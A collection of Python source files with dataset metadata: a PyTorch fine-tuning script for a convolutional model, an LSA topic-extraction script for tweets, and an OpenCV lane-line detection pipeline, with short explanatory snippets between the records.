y)\r\n            optimizer.zero_grad()\r\n            train_loss.backward()\r\n            optimizer.step()\r\n            global_step = global_step + 1\r\n            epoch_loss += train_loss.item()\r\n            loss_metrics.add(train_loss.item())\r\n        print(\"[epoch {}]: loss {}\".format(epoch, loss_metrics.value()[0]))\r\n        loss_metrics.reset()\r\n        scheduler.step()\r\n\r\n    return net\r\n\r\n\r\n\r\ndef main(lr, total_epoch, model_name, batch_size):\r\n    out_dir = r\"./data-con-model\"\r\n    if not os.path.exists(out_dir):\r\n        os.mkdir(out_dir)\r\n    features_train = np.load('../../SMAPtest/conv-model/data-con-model/features_train.npy')\r\n    label_train = np.load('../../SMAPtest/conv-model/data-con-model/label_train.npy')\r\n\r\n    print('finished loading data for finetune-conv model')\r\n\r\n    features_train = torch.tensor(features_train.reshape(-1, features_train.shape[1]*features_train.shape[2],\r\n                                                         features_train.shape[3], features_train.shape[4]),\r\n                                  dtype=torch.float32).cuda()\r\n\r\n    label_train = torch.tensor(label_train.reshape(-1, label_train.shape[1]*label_train.shape[2]), dtype=torch.float32).cuda()\r\n\r\n    dataset = Data.TensorDataset(features_train, label_train)\r\n    train_loader = Data.DataLoader(\r\n        dataset=dataset,\r\n        batch_size=batch_size,\r\n        shuffle=True,\r\n        num_workers=0\r\n    )\r\n    # load the pretrained conv model and finetune it\r\n    net = torch.load('../../ERA5test/conv-model/data-con-model/con_params.pkl')\r\n    net.cuda()\r\n    model = train_conv(net, lr, train_loader, total_epoch)\r\n    print('finished training conv model')\r\n    torch.save(model, './data-con-model/con_params.pkl')\r\n\r\n\r\nif __name__ == '__main__':\r\n    p = ArgParser()\r\n    p.add_argument('--lr', type=float, default=1e-3, help='Learning rate')\r\n    p.add_argument('--total_epoch', type=int, default=30, help='total epochs for training the model')\r\n    p.add_argument('--model_name', type=str, default='Conv-model', help='name for prediction model')\r\n    p.add_argument('--batch_size', type=int, default=128, help='batch_size')\r\n    args = p.parse_args()\r\n\r\n    main(\r\n        lr=args.lr,\r\n        total_epoch=args.total_epoch,\r\n        model_name=args.model_name,\r\n        batch_size=args.batch_size\r\n    )\r\n","sub_path":"fintune-SMAPtest/conv-model/train-fintune-conv-model.py","file_name":"train-fintune-conv-model.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
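The in-loop mask multiplication in train_conv amounts to a masked MSE. Factored into a helper for clarity; the name `masked_mse` and the broadcastable mask shape are assumptions for illustration:

```python
import torch

def masked_mse(pred, target, mask):
    # Zero out masked positions on both sides before the usual MSE,
    # the same thing train_conv above does inline with the A.npy mask.
    # Note this still averages over all elements, masked ones included.
    return torch.nn.functional.mse_loss(pred * mask, target * mask)

pred = torch.randn(4, 10)
target = torch.randn(4, 10)
mask = (torch.rand(10) > 0.5).float()  # broadcasts over the batch dimension
print(masked_mse(pred, target, mask).item())
```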
+{"seq_id":"444356815","text":"\nfrom typing import List, Any\n\nimport nltk\nfrom nltk.corpus import stopwords\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import TruncatedSVD\n\ndef extract_tokens(tweet_tuples: List[Any]) -> List[Any]:\n    tokens_list = []\n\n    for tweet_dict, classification in tweet_tuples:\n        for key in tweet_dict.keys():  # each tweet dict maps token -> frequency\n            tokens_list.append(key)\n    return tokens_list\n\ndef latent_semantic_analysis(data: List[Any] = None, language: str = \"english\", num_comps: int = 100):\n    # num_comps = 100 as recommended by the sklearn documentation for LSA\n    data = data or []  # avoid the mutable-default-argument pitfall\n    stop_set = set(stopwords.words(language))\n\n    vectorizer = TfidfVectorizer(stop_words=stop_set, use_idf=True, ngram_range=(1, 3))\n\n    # load all the data from the list onto the matrix, with words and their freqs\n    text_data = extract_tokens(data)  # tokens\n    doc_matrix = vectorizer.fit_transform(text_data)\n\n    lsa = TruncatedSVD(n_components=num_comps, n_iter=100)\n\n    lsa.fit(doc_matrix)\n\n    # first row of V^T (transposed):\n    # lsa.components_[0]\n\n    terms = vectorizer.get_feature_names()\n\n    for i, comp in enumerate(lsa.components_):\n        term_in_comp = zip(terms, comp)\n\n        # keep only the 10 highest-weighted terms per concept\n        sorted_terms = sorted(term_in_comp, key=lambda x: x[1], reverse=True)[:10]\n\n        print(f\"Concept[{i}]:\\n\\t\")\n\n        # list of tuples: the first value is the term, the second value is its weight\n        for term in sorted_terms:\n            print(term)\n            print(f\"\\t{term[0]}\")\n\n        print()\n\n    return\n","sub_path":"data_processing/lsi.py","file_name":"lsi.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
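For reference, the same TF-IDF plus TruncatedSVD recipe on a toy corpus, without the tweet-tuple plumbing; a minimal sketch, where `get_feature_names_out` is the sklearn >= 1.0 spelling of the accessor the module above calls `get_feature_names`:

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.decomposition import TruncatedSVD

docs = ["the cat sat on the mat",
        "the dog chased the cat",
        "stocks fell as markets slid",
        "markets rallied and stocks rose"]

vectorizer = TfidfVectorizer(stop_words="english")
doc_matrix = vectorizer.fit_transform(docs)

# n_components must be smaller than the vocabulary; 2 concepts suits this toy corpus.
lsa = TruncatedSVD(n_components=2, n_iter=100)
lsa.fit(doc_matrix)

terms = vectorizer.get_feature_names_out()  # get_feature_names() on older sklearn
for i, comp in enumerate(lsa.components_):
    top = sorted(zip(terms, comp), key=lambda x: x[1], reverse=True)[:3]
    print(f"Concept[{i}]:", [t for t, _ in top])
```

On this corpus the two concepts separate cleanly into pet words and market words, which is the behavior the per-concept term printout in lsi.py is meant to surface.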
+{"seq_id":"123881152","text":"# -*- coding: utf-8 -*-\n\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nimport os\n\ndef grayscale(img):\n    \"\"\"Applies the Grayscale transform\n    This will return an image with only one color channel\n    but NOTE: to see the returned image as grayscale\n    (assuming your grayscaled image is called 'gray')\n    you should call plt.imshow(gray, cmap='gray')\"\"\"\n    # return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n    # Or use BGR2GRAY if you read an image with cv2.imread()\n    return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ndef canny(img, low_threshold, high_threshold):\n    \"\"\"Applies the Canny transform\"\"\"\n    return cv2.Canny(img, low_threshold, high_threshold)\n\ndef gaussian_blur(img, kernel_size):\n    \"\"\"Applies a Gaussian Noise kernel\"\"\"\n    return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\ndef region_of_interest(img, vertices):\n    \"\"\"\n    Applies an image mask.\n\n    Only keeps the region of the image defined by the polygon\n    formed from `vertices`. The rest of the image is set to black.\n    \"\"\"\n    # defining a blank mask to start with\n    mask = np.zeros_like(img)\n\n    # defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n    if len(img.shape) > 2:\n        channel_count = img.shape[2]  # i.e. 3 or 4 depending on your image\n        ignore_mask_color = (255,) * channel_count\n    else:\n        ignore_mask_color = 255\n\n    # filling pixels inside the polygon defined by \"vertices\" with the fill color\n    cv2.fillPoly(mask, vertices, ignore_mask_color)\n\n    # returning the image only where mask pixels are nonzero\n    masked_image = cv2.bitwise_and(img, mask)\n    return masked_image\n\n\ndef draw_lines(img, lines, color=[0, 0, 255], thickness=2):\n    \"\"\"\n    NOTE: this is the function you might want to use as a starting point once you want to\n    average/extrapolate the line segments you detect to map out the full\n    extent of the lane (going from the result shown in raw-lines-example.mp4\n    to that shown in P1_example.mp4).\n\n    Think about things like separating line segments by their\n    slope ((y2-y1)/(x2-x1)) to decide which segments are part of the left\n    line vs. the right line. Then, you can average the position of each of\n    the lines and extrapolate to the top and bottom of the lane.\n\n    This function draws `lines` with `color` and `thickness`.\n    Lines are drawn on the image inplace (mutates the image).\n    If you want to make the lines semi-transparent, think about combining\n    this function with the weighted_img() function below\n    \"\"\"\n    for line in lines:\n        for x1, y1, x2, y2 in line:\n            cv2.line(img, (x1, y1), (x2, y2), color, thickness)\n\ndef hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap):\n    \"\"\"\n    `img` should be the output of a Canny transform.\n\n    Returns an image with hough lines drawn, plus the raw segments.\n    \"\"\"\n    lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n    line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n    draw_lines(line_img, lines)\n    return line_img, lines\n\n# Python 3 has support for cool math symbols.\n\ndef weighted_img(img, initial_img, α=0.8, β=1., λ=0.):\n    \"\"\"\n    `img` is the output of the hough_lines(), an image with lines drawn on it.\n    Should be a blank image (all black) with lines drawn on it.\n\n    `initial_img` should be the image before any processing.\n\n    The result image is computed as follows:\n\n    initial_img * α + img * β + λ\n    NOTE: initial_img and img must be the same shape!\n    \"\"\"\n    return cv2.addWeighted(initial_img, α, img, β, λ)\n\n\n\n\n# TODO: Build your pipeline that will draw lane lines on the test_images\n# then save them to the test_images directory.\nclass LaneFinding:\n\n    def __init__(self, test_image_dir):\n        self.input_dir = test_image_dir\n        self.output_dir = test_image_dir\n\n    def load_image(self, image_name):\n        image = cv2.imread(\"%s/%s\" % (self.input_dir, image_name))\n        return image\n\n    def save_image(self, image_name, image):\n        return cv2.imwrite(\"%s/%s\" % (self.output_dir, image_name), image)\n\n    def slope_binning(self, lines):\n        \"\"\"\n        Binning lines by their slopes, into two bins,\n        one for positive, another for negative\n        \"\"\"\n        positive_idx = 0\n        negative_idx = 1\n\n        binnings = [[], []]\n        slopes = [[], []]\n\n        for line in lines:\n            dx, dy = line[0][0:2] - line[0][2:4]\n            slope = dy / dx\n            if slope >= 0:\n                binnings[positive_idx].append(line)\n                slopes[positive_idx].append(slope)\n            else:\n                binnings[negative_idx].append(line)\n                slopes[negative_idx].append(slope)\n\n        return binnings, slopes\n\n    def scan_binning(self, binning, slopes, delta_slope_err=0.07):\n        filtered_binning = []\n        filtered_slopes = []\n        median_slope = np.median(slopes)\n        for i, slope in enumerate(slopes):\n            if abs(slope - median_slope) <= delta_slope_err:\n                filtered_binning.append(binning[i])\n                filtered_slopes.append(slope)\n\n        # TODO: handle an empty filtered_binning\n        _max_vec = np.max(filtered_binning, axis=0)\n        max_vpos = np.max([_max_vec[0][1], _max_vec[0][3]])\n        _min_vec = np.min(filtered_binning, axis=0)\n        min_vpos = np.min([_min_vec[0][1], _min_vec[0][3]])\n\n        step = 5\n        vpos = min_vpos\n        scanned_middle_points = []\n        scanned_lane_width = []\n        while vpos < max_vpos:\n            holder = []\n            for line in filtered_binning:\n                if (vpos - line[0][1]) * (vpos - line[0][3]) < 0:\n                    holder.append([self.get_horizontal_pos(vpos, line), vpos, ])\n                if len(holder) >= 2:\n                    break\n            if len(holder) >= 2:\n                width = abs(holder[0][0] - holder[1][0])\n                if width > 2:\n                    scanned_middle_points.append(np.average(holder, axis=0))\n                    scanned_lane_width.append(width)\n            vpos += step\n\n        return scanned_middle_points, scanned_lane_width\n\n    def get_horizontal_pos(self, vpos, line):\n        k = (line[0][1] - vpos) / (vpos - line[0][3])\n        return (line[0][0] + k * line[0][2]) / (1 + k)\n\n    def fit_line(self, points, widths, thickiria=0.6, vmax=539, vmin=330):\n        thickness = widths[-1] * thickiria\n        _line = np.array([np.concatenate([points[0], points[-1]])])\n        #vmin = min(vmin, points[0][1])\n        #vmax = max(vmax, points[1][1])\n        hmax = self.get_horizontal_pos(vmax, _line)\n        hmin = self.get_horizontal_pos(vmin, _line)\n        expanded_line = np.array([list(map(int, [hmax, vmax, hmin, vmin]))])\n        return expanded_line, 13  # fixed thickness; the computed value above is unused\n\n    def pipeline(self, img):\n        copy = np.copy(img) * 0\n\n        gray_image = grayscale(img)\n\n        kernel_size = 5\n        blurred_image = gaussian_blur(gray_image, kernel_size)\n\n        low_threshold = 100\n        high_threshold = 200\n        edges = cv2.Canny(blurred_image, low_threshold, high_threshold)\n\n        vertices = np.array([[(0, 540), (960, 540), (480, 330)]], np.int32)\n        masked_image = region_of_interest(edges, vertices)\n\n        rho = 1\n        theta = np.pi / 135\n        threshold = 1\n        min_line_len = 10\n        max_line_gap = 4\n        hough_lines_image, lines = hough_lines(\n            masked_image, rho, theta, threshold, min_line_len, max_line_gap)\n\n        hough_image = weighted_img(hough_lines_image, img)\n        # NOTE: returning here leaves the slope-binning / extrapolation code below\n        # unreachable; it is kept from an earlier experiment in this backup file.\n        return hough_image\n        #cv2.imshow(\"hough\", blended_image)\n        #cv2.waitKey(-1)\n\n        binnings, slopes = self.slope_binning(lines)\n\n        line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n        for b, s in zip(binnings, slopes):\n            middle_points, lane_widths = self.scan_binning(\n                b, s, delta_slope_err=0.1)\n            if len(lane_widths) <= 1:\n                continue\n            line, thickness = self.fit_line(middle_points, lane_widths)\n            draw_lines(line_img, [line, ], thickness=int(thickness))\n\n        blended_image = weighted_img(line_img, img)\n        #cv2.imshow(\"mine\", blended_image)\n        #cv2.waitKey(-1)\n        return hough_image\n\n\n    def run_image_dir(self):\n        for image_name in os.listdir(self.input_dir):\n            if image_name.startswith(\"output_\"):\n                continue\n            #if image_name != \"solidYellowCurve2.jpg\":\n            #    continue\n\n            image = self.load_image(image_name)\n\n            output_image = self.pipeline(image)\n\n            self.save_image(\"output_%s\" % image_name, output_image)\n\n\n    def run_image(self, image):\n        output_image = self.pipeline(image)\n        return output_image\n\n\ndef test():\n    lf = LaneFinding(\"test_images\")\n    lf.run_image_dir()\n\ntest()\n","sub_path":"proj1_bak.py","file_name":"proj1_bak.py","file_ext":"py","file_size_in_byte":9028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
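The draw_lines docstring above suggests averaging the segments on each side and extrapolating them to the top and bottom of the lane. A common lightweight alternative to the scan-based fit in LaneFinding is a least-squares fit over the segment endpoints; this is a sketch under those assumptions, not the file's own method:

```python
import numpy as np

def extrapolate_lane(segments, y_bottom=540, y_top=330):
    # segments: iterable of [x1, y1, x2, y2] Hough segments for one lane side.
    # Fit x = f(y) so near-vertical lanes stay well-conditioned, then evaluate
    # at the bottom and top of the region of interest (540/330 as in pipeline()).
    pts = np.asarray(segments, dtype=float).reshape(-1, 2)  # rows of (x, y) endpoints
    fit = np.polyfit(pts[:, 1], pts[:, 0], 1)               # x = m*y + b
    x_bottom, x_top = np.polyval(fit, [y_bottom, y_top])
    return int(x_bottom), y_bottom, int(x_top), y_top

segments = [[100, 500, 180, 420], [190, 410, 260, 340]]
print(extrapolate_lane(segments))  # (60, 540, 270, 330) for this collinear toy input
```

The resulting 4-tuple can be fed straight to draw_lines as a single averaged segment per side.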